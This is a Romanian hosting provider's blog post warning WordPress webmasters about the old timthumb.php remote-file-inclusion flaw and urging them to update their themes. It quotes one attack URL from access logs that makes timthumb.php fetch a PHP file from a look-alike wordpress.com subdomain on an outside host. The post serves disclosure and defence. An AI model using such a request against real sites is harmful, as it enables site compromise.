Arhiva etichetelor: hacker

vulnerabilitate wordpress: timthumb.php

Blogurile WordPress au mare succes. Acesta este unul. Arată bine, sunt multe module şi teme care „iau ochii” vizitatorilor. Nu mai sunt simple bloguri, unele sunt chiar site-uri de prezentare a unui mic business. Se administrează uşor, se modifică uşor, încărcăm poze etc.

Ceea ce nu ştiu mulţi clienţi este cât sunt de „vânate” aceste bloguri. Au o mare supriză când se trezesc cu ele sparte, cu texte pornografice, cu mii de emailuri expediate de fişiere încărcate de te miri cine pe blog. Am suspendat din păcate de-a lungul vremii câteva asemenea bloguri. Reacţiile au fost bineînţeles dintre cele mai iritate.

Foarte multe teme populare pe internet folosesc un script numit timthumb care la încărcarea unui imagini o prelucrează pentru web. Variantele mai vechi ale acestui script sunt cunoscute de hackeri a fi foarte vulnerabile la injecţia de cod maliţios. În afară de încărcarea de imagini de pe calculator, Timthumb poate importa imagini de pe site-urile populare, cum ar fi wordpress, picassa sau photobucket pentru publicare pe blog. Totuşi variantele mai vechi ale acestui script „uită” să verifice cu atenţie adresa de la care importă imaginile, aşa că dacă un hacker îşi crează pe site-ul său un subdomeniu wordpress.com atunci gata, timthumb va importa un fişier de pe site-ul hacker-ului.

În jurnalele de acces (sunt „obsedat” de securitatea acestora), am constatat un noian de asemenea încercăride a sparge blogurile găzduite de serverele Nettissimo.

De pildă hackerul accesează următorul link:

http://adresa_blog/en/timthumb.php?src=http%3A%2F%2Fwordpress.com.erickcosta.com.br%2Fjahat.php

Şi gata fişierul jahat.php este importat. Site-ul de pe care este importat nu este wordpress.com ci wordpress.com.erickcosta.com, dar varianta veche de timthumb nu verifică corect.

Evident că am instalat bariere pe server şi că serverul va bloca accesarea acestui link.

Veţi zice: ce mare scofală clientul să-şi actualizeze versiunea de wordpress. Ei bine veţi fi uimiţi câte teme populare, mai mult sau mai puţin legal obţinute de webmasteri, conţin o versiune veche şi prin urmare vulnerabilă a fişierului timthumb.php. Actualizarea wordpress nu înseamnă neapărat şi actualizarea temei respective folosite de webmaster, ceea ce înseamnă că fişierul timthumb.php rămâne tot vulnerabil

Deci, stimaţi webmasteri, urgenţă de gradul 0: când instalaţi o temă wordpress care „ia ochii” verificaţi neapărat să conţină varianta cea mai recentă a thimthumb.php. Ultima variantă poate fi obţinută de pe pagina proiectului.

Există un modul wordpress care verifică dacă tema folosită este vulnerabilă. Folosiţi-l cu încredere.

Fişierul timthumb.php „se ascunde” de obicei în tema instalată de wordpress, ceva de genul:

/wp-content/themes/thedawn/lib/scripts/timthumb.php

Unde thedawn este directorul in care s-a instalat tema „The Dawn”.